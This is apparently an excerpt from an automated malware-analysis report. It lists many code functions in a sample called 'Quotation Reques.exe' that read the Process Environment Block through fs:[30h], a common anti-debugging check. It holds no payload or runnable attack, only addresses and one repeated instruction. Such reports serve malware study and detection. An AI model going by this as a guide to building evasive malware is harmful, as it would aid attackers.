Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01194120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01194120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01194120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01194120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01194120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01197D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011B3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0119B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0119B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0119C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0119C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011AFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011AFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_012405AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_012405AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0119C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01172D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01172D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01172D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01172D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01172D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011AA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0123FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0123FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0123FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0123FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_012041E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01228DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0118D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0118D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01231C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0124740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0124740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0124740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01244015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01244015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0118B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0118B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0118B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0118B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011ABC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01190050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01190050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01232073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01241074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011AA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0120C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0120C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0119746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0118849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01179080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011AF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011AF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011AF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011B90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_012314FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0120B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0120B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0120B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0120B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0120B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0120B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01248CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011758EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0119F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011AA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011AA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0124070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0124070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011AE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0120FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0120FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0123131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01174F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01174F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01248F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0118EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0118FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01248B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01245BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011AB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01188794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01181B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01181B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0122D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0123138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011F53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011B37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0119DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01193A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011AA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011AA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01175210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01175210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01175210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01175210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01188A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0122FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01231608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011B4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011B4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0122B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0122B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01248A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01179240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01179240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01179240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01179240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01187E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01187E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01187E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01187E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01187E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01187E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011B927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0123AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0123AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0119AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0119AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0119AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0119AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0119AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0118766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0123EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01204257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01240EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01240EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01240EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0120FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011F46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0122FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01248ED6 mov eax, dword ptr fs:[00000030h]
